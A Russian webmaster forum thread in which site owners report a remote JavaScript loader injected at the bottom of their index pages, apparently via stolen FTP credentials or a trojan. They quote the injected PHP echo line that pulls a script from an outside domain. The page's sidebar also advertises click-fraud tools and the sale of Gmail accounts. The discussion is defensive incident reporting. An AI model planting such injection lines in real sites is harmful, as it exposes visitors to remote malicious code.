А вот и "левый" код у меня появился

Сообщений: 21837 Регистрация: Май 2011

31 Декабря 2012 14:22

В 7-49 мск одновременно 7 сайтов на 3 разных хостингах, но у одного хостера получили в довесок последней строкой в индексной странице вызов удаленного js-скрипта со странного домена. Причём внедряльщик чётко разделял html от php и внедрялся по-разному (в php через print). Странно, чтопострадали только выборочные сайты, никак не связанные друг с другом ни конкретным IP, ни тематикой, ни внутренней структурой. Код ничего не делал на момент обнаружения, подозреваю, что это готовится сюрприз на "каникулы".
ссылка на внедрённый код была следующей : _http:// kinoshkaxa. changeip. name/rsize.js
Узнать, что он собирался делать мне, видимо, не судьба, к счастью...
Отписался в ТП хостинга, но, блин, 31 декабря... Грешу на свой клиент FTP, в котором я, по-наивности, держал сохраненными пароли от ftp-доступа. Пароли срочно поменял, сохранение, естесственно, отключил.
Чур меня, чур! smile:confused:

Мы не можем похвастаться мудростью глаз
И умелыми жестами рук,
Нам не нужно все это, чтобы друг друга понять.
Сигареты в руках, чай на столе - так замыкается круг,
И вдруг нам становится страшно что-то менять.

Scorpion71

Сообщений: 739 Регистрация: Апр 2011

31 Декабря 2012 14:44

Цитата
Злой, но Позитивный ЧЕЛовек пишет: Грешу на свой клиент FTP, в котором я, по-наивности, держал сохраненными пароли от ftp-доступа.

А почему-бы не поставить блокировку по IP?

Inferno Solutions: Выделенные серверы и VPS по самым низким ценам. От 10$ в месяц!

Злой, но Позитивный ЧЕЛовек

Сообщений: 21837 Регистрация: Май 2011

31 Декабря 2012 14:54

Цитата
Scorpion71 пишет: А почему-бы не поставить блокировку по IP?

дык динамический у меня адрес... мало того, я ещё и дислокацию меняю (в 4 разных совершенно городах живу постоянно), он у меня - супердинамический smile:)

Scorpion71

Сообщений: 739 Регистрация: Апр 2011

31 Декабря 2012 15:20

Цитата
Злой, но Позитивный ЧЕЛовек пишет: дык динамический у меня адрес... мало того, я ещё и дислокацию меняю (в 4 разных совершенно городах живу постоянно), он у меня - супердинамический

Пропиши все свои подсети тогда smile:)

андрей котов

Сообщений: 8 Регистрация: Июн 2011

1 Января 2013 14:15

Такой код echo '<script src="kinoshkaxa.changeip.name/rsize.js"></script>'; и у меня появился в index.php в самом низу, хорошо что каспер среагировал, раньше чем робот яндекса, а то щас бы сидел с пометкой ваш сайт опасен )))

netnsk

Сообщений: 39 Регистрация: Мар 2010

10 Января 2013 08:50

Аналогично. Судя по дате инфицирования - предполагаю, что это результат работы вируса, заражающего hosts на компе, в результате чего появляется надпись STOP "Доступ к сайту запрещен" +7XXXX....
Видимо заражает сайты через "Total Commander" Но принцип заражения не совсем понятен т.к. не все index.php index.html дописывает.

DreamSee Сообщений: 36 Регистрация: Янв 2013	#7 14 Января 2013 15:09 Блокировка по IP ничем не поможет. Скорее всего у Вас троян на компе. Проверяли компьютер на вирусы?

Новые темы	Объявления	Свободное общение
21:49 Как правильно покупать ссылки для поддомена? 18:51 Роскомнадзор отказал в регистрации трети блогеров-десятитысячников 12:53 где много готовых фавиконок 22:59 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 12:32 «Хлебные крошки» в адресе сайтов исчезнут из результатов поиска Google 23:27 Adfinity - Ваш надежный партнер в монетизации трафика 16:55 Инструменты для массового постинга в WordPress	01:53 Европейский эквайринг 20:19 GoogleWalker - устранение конкурентов в Google Ads \| Автоматизированная система склика \| АНТИБАН 16:39 Продам аккаунты Gmail USA IP \| Gmail MIX IP \| Outlook Old 11:07 Мобильные и Резидентные Прокси Для Соц Сетей \| 3 Гб Бесплатно 11:01 Защитим твой ресурс от блокировки Роскомнадзора 10:09 BestChange – обменивать электронную валюту можно быстро и выгодно 06:50 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка	23:52 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 07:48 США готовят закон для уничтожения пиратских сайтов во всех странах мира 02:50 Точные прогнозы на футбол 02:10 [Новая партнерка] Goldbet Partners — прямой рекламодатель одноименного казино Goldbet 21:19 С юмором по жизни! 18:15 Telegram уничтожил официальный канал легендарного российского торрент-трекера 18:19 Уникальный сервис SEO продвижения

Новые темы

Объявления

Свободное общение

21:49 Как правильно покупать ссылки для поддомена?
18:51 Роскомнадзор отказал в регистрации трети блогеров-десятитысячников
12:53 где много готовых фавиконок
22:59 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу.
12:32 «Хлебные крошки» в адресе сайтов исчезнут из результатов поиска Google
23:27 Adfinity - Ваш надежный партнер в монетизации трафика
16:55 Инструменты для массового постинга в WordPress

01:53 Европейский эквайринг
20:19 GoogleWalker - устранение конкурентов в Google Ads | Автоматизированная система склика | АНТИБАН
16:39 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old
11:07 Мобильные и Резидентные Прокси Для Соц Сетей | 3 Гб Бесплатно
11:01 Защитим твой ресурс от блокировки Роскомнадзора
10:09 BestChange – обменивать электронную валюту можно быстро и выгодно
06:50 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка

23:52 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди
07:48 США готовят закон для уничтожения пиратских сайтов во всех странах мира
02:50 Точные прогнозы на футбол
02:10 [Новая партнерка] Goldbet Partners — прямой рекламодатель одноименного казино Goldbet
21:19 С юмором по жизни!
18:15 Telegram уничтожил официальный канал легендарного российского торрент-трекера
18:19 Уникальный сервис SEO продвижения